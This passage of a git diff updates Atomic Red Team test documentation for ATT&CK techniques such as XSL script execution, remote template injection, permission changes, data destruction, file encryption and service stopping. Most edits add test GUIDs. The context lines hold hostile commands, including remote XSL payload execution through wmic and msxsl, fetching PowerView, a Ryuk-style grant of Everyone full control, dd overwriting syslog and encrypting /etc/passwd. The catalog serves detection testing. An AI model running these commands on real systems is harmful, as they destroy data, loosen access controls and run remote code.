groups targeting instit
## Atomic Test #1 - TeamViewer Files Detected Test on Windows -An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. +auto_generated_guid: 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 + +An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. **Supported Platforms:** Windows @@ -52,8 +54,10 @@ Remove-Item $file1 -ErrorAction Ignore | Out-Null
## Atomic Test #2 - AnyDesk Files Detected Test on Windows -An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. +auto_generated_guid: 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 + +An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. **Supported Platforms:** Windows @@ -83,8 +87,10 @@ Remove-Item $file1 -ErrorAction Ignore
## Atomic Test #3 - LogMeIn Files Detected Test on Windows -An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. +auto_generated_guid: d03683ec-aae0-42f9-9b4c-534780e0f8e1 + +An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. **Supported Platforms:** Windows diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index b38e74bc..43a4c44f 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -31,15 +31,17 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files -Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. +auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d + +Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xmlfile | Location of the test XML file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslxmlfile.xml| | xslfile | Location of the test XSL script file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslscript.xsl| @@ -59,7 +61,7 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} ##### Description: XML file must exist on disk at specified location (#{xmlfile}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{xmlfile}) {exit 0} else {exit 1} +if (Test-Path #{xmlfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -69,7 +71,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato ##### Description: XSL file must exist on disk at specified location (#{xslfile}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{xslfile}) {exit 0} else {exit 1} +if (Test-Path #{xslfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -84,15 +86,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSXSL Bypass using remote files -Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. +auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 + +Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml| | xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl| @@ -114,15 +118,17 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
## Atomic Test #3 - WMIC bypass using local XSL file -Executes the code specified within a XSL script using a local payload. +auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 + +Executes the code specified within a XSL script using a local payload. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | wmic_command | WMI command to execute using wmic.exe | string | process list| | local_xsl_file | Location of the test XSL script file on the local filesystem. | path | PathToAtomicsFolder\T1220\src\wmicscript.xsl| @@ -142,7 +148,7 @@ wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" ##### Description: XSL file must exist on disk at specified location (#{local_xsl_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} +if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -157,15 +163,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - WMIC bypass using remote XSL file -Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. +auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b + +Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl| | wmic_command | WMI command to execute using wmic.exe | string | process list| diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index 9f9d5708..3c8a6061 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,18 +16,20 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection + +auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d + Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| @@ -46,7 +48,7 @@ start #{docx_file} ##### Description: ##### Check Prereq Commands: ```powershell - + ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index def6c2c7..3091fc0d 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -22,16 +22,18 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as
## Atomic Test #1 - Take ownership using takeown utility + +auto_generated_guid: 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 + Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | %temp%\T1222.001_takeown_folder| @@ -50,7 +52,7 @@ takeown.exe /f #{file_folder_to_own} /r ##### Description: Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -66,17 +68,19 @@ echo T1222.001_takeown2 >> #{file_folder_to_own}\T1222.001_takeown2.txt
## Atomic Test #2 - cacls - Grant permission to specified user or group recursively + +auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 + Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files" will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_or_folder | Path of the file or folder to change permissions. | path | %temp%\T1222.001_cacls| | user_or_group | User or group to allow full control | string | Everyone| @@ -96,7 +100,7 @@ icacls.exe #{file_or_folder} /grant #{user_or_group}:F ##### Description: Test requrires a file to modify to be located at (#{file_or_folder}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -112,16 +116,18 @@ echo T1222.001_cacls2 >> #{file_or_folder}\T1222.001_cacls2.txt
## Atomic Test #3 - attrib - Remove read-only attribute + +auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 + Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib| @@ -140,7 +146,7 @@ attrib.exe -r #{file_or_folder}\*.* /s ##### Description: Test requrires a file to modify to be located at (#{file_or_folder}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -158,16 +164,18 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #4 - attrib - hide file + +auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c + Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib_2| @@ -194,7 +202,7 @@ rmdir #{file_or_folder} ##### Description: Test requires a file to modify to be located at (#{file_or_folder}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -210,18 +218,20 @@ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style + +auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 + Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls "C:\*" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\*" if you prefer. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| | file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt| @@ -245,7 +255,7 @@ icacls '#{path}' /restore #{file_path} /q >nul 2>&1 ##### Description: Backup of original folder permissions should exist (for use in cleanup commands) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index 607a4344..d433f301 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -30,15 +30,17 @@ Adversarial may use these commands to make themselves the owner of files and dir
## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) -Changes a file or folder's permissions using chmod and a specified numeric mode. +auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 + +Changes a file or folder's permissions using chmod and a specified numeric mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | numeric_mode | Specified numeric mode value | string | 755| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -60,15 +62,17 @@ chmod #{numeric_mode} #{file_or_folder}
## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) -Changes a file or folder's permissions using chmod and a specified symbolic mode. +auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 + +Changes a file or folder's permissions using chmod and a specified symbolic mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | symbolic_mode | Specified symbolic mode value | string | a+w| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -90,15 +94,17 @@ chmod #{symbolic_mode} #{file_or_folder}
## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively -Changes a file or folder's permissions recursively using chmod and a specified numeric mode. +auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 + +Changes a file or folder's permissions recursively using chmod and a specified numeric mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | numeric_mode | Specified numeric mode value | string | 755| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -120,15 +126,17 @@ chmod #{numeric_mode} #{file_or_folder} -R
## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively -Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. +auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f + +Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | symbolic_mode | Specified symbolic mode value | string | a+w| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -150,15 +158,17 @@ chmod #{symbolic_mode} #{file_or_folder} -R
## Atomic Test #5 - chown - Change file or folder ownership and group -Changes a file or folder's ownership and group information using chown. +auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 + +Changes a file or folder's ownership and group information using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml| @@ -181,15 +191,17 @@ chown #{owner}:#{group} #{file_or_folder}
## Atomic Test #6 - chown - Change file or folder ownership and group recursively -Changes a file or folder's ownership and group information recursively using chown. +auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 + +Changes a file or folder's ownership and group information recursively using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -212,15 +224,17 @@ chown #{owner}:#{group} #{file_or_folder} -R
## Atomic Test #7 - chown - Change file or folder mode ownership only -Changes a file or folder's ownership only using chown. +auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 + +Changes a file or folder's ownership only using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml| @@ -242,15 +256,17 @@ chown #{owner} #{file_or_folder}
## Atomic Test #8 - chown - Change file or folder ownership recursively -Changes a file or folder's ownership only recursively using chown. +auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 + +Changes a file or folder's ownership only recursively using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -272,16 +288,18 @@ chown #{owner} #{file_or_folder} -R
## Atomic Test #9 - chattr - Remove immutable file attribute + +auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f + Remove's a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_modify | Path of the file | path | /var/spool/cron/root| diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index f5d5b0ab..3d3deafa 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -18,9 +18,11 @@
## Atomic Test #1 - Windows - Discover domain trusts with dsquery + +auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f + Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role. - **Supported Platforms:** Windows @@ -43,10 +45,12 @@ dsquery * -filter "(objectClass=trustedDomain)" -attr *
## Atomic Test #2 - Windows - Discover domain trusts with nltest + +auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe + Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family. - **Supported Platforms:** Windows @@ -67,7 +71,7 @@ nltest /domain_trusts ##### Description: nltest.exe from RSAT must be present on disk ##### Check Prereq Commands: ```cmd -WHERE nltest.exe >NUL 2>&1 +WHERE nltest.exe >NUL 2>&1 ``` ##### Get Prereq Commands: ```cmd @@ -81,9 +85,11 @@ echo Sorry RSAT must be installed manually
## Atomic Test #3 - Powershell enumerate domains and forests + +auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 + Use powershell to enumerate AD information. Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role. - **Supported Platforms:** Windows @@ -108,7 +114,7 @@ Get-ADGroupMember Administrators -Recursive ##### Description: PowerView PowerShell script must exist on disk ##### Check Prereq Commands: ```powershell -if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} +if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -117,7 +123,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit ##### Description: RSAT PowerShell AD admin cmdlets must be installed ##### Check Prereq Commands: ```powershell -if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } +if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -131,16 +137,18 @@ Write-Host "Sorry RSAT must be installed manually"
## Atomic Test #4 - Adfind - Enumerate Active Directory OUs + +auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -159,7 +167,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -173,16 +181,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #5 - Adfind - Enumerate Active Directory Trusts + +auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -201,7 +211,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 82bfd6ff..32873bd4 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -18,16 +18,18 @@ In cloud environments, adversaries may leverage access to delete cloud storage,
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete + +auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2 + Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in the powershell session along with other information about the file that was deleted. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe| | file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt| @@ -48,7 +50,7 @@ Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" ##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} +if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -64,16 +66,18 @@ Remove-Item $env:TEMP\SDelete.zip -Force
## Atomic Test #2 - macOS/Linux - Overwrite file with DD + +auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 + Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | overwrite_source | Path of data source to overwrite with | Path | /dev/zero| | file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog| diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index b38a9f1f..bad8ac5a 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -20,15 +20,17 @@ In cloud environments, storage objects within compromised accounts may also be e
## Atomic Test #1 - Encrypt files using gpg (Linux) -Uses gpg to encrypt a file +auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 + +Uses gpg to encrypt a file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd| | encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.gpg| @@ -54,7 +56,7 @@ rm #{encrypted_file_path} ##### Description: Finds where gpg is located ##### Check Prereq Commands: ```bash -which_gpg=`which gpg` +which_gpg=`which gpg` ``` ##### Get Prereq Commands: ```bash @@ -68,15 +70,17 @@ which_gpg=`which gpg`
## Atomic Test #2 - Encrypt files using 7z (Linux) -Uses 7z to encrypt a file +auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad + +Uses 7z to encrypt a file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd| | encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip| @@ -102,7 +106,7 @@ rm #{encrypted_file_path} ##### Description: Finds where 7z is located ##### Check Prereq Commands: ```bash -which_7z=`which 7z` +which_7z=`which 7z` ``` ##### Get Prereq Commands: ```bash @@ -116,15 +120,17 @@ which_7z=`which 7z`
## Atomic Test #3 - Encrypt files using ccrypt (Linux) -Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. +auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f + +Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cped_file_path | path where you want your copied file to be | Path | /tmp/passwd| | root_input_file_path | path to the file that you want to be encrypted if you are root user | Path | /etc/passwd| @@ -152,7 +158,7 @@ if [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; els ```bash which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` -if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi +if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi ``` ##### Get Prereq Commands: ```bash @@ -166,15 +172,17 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
## Atomic Test #4 - Encrypt files using openssl (Linux) -Uses openssl to encrypt a file +auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 + +Uses openssl to encrypt a file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | private_key_path | path to the private key | Path | /tmp/key.pem| | public_key_path | path to the public key | Path | /tmp/pub.pem| @@ -204,7 +212,7 @@ rm #{encrypted_file_path} ##### Description: Finds where openssl is located ##### Check Prereq Commands: ```bash -which_openssl=`which openssl` +which_openssl=`which openssl` ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index c3d686e0..4658beaa 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -16,17 +16,19 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller + +auto_generated_guid: 21dfb440-830d-4c86-a3e5-2a491d5a8d04 + Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be started by running the cleanup command. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of a service to stop | String | spooler| @@ -51,17 +53,19 @@ sc.exe start #{service_name} >nul 2>&1
## Atomic Test #2 - Windows - Stop service using net.exe + +auto_generated_guid: 41274289-ec9c-4213-bea4-e43c4aa57954 + Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of a service to stop | String | spooler| @@ -86,18 +90,20 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #3 - Windows - Stop service by killing process + +auto_generated_guid: f3191b84-c38b-400b-867e-3a217a27795f + Stops a specified service killng the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_name | Name of a process to kill | String | spoolsv.exe| diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 99ce741a..c239f5bc 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -29,13 +29,15 @@ A number of native Windows utilities have been used by adversaries to disable or
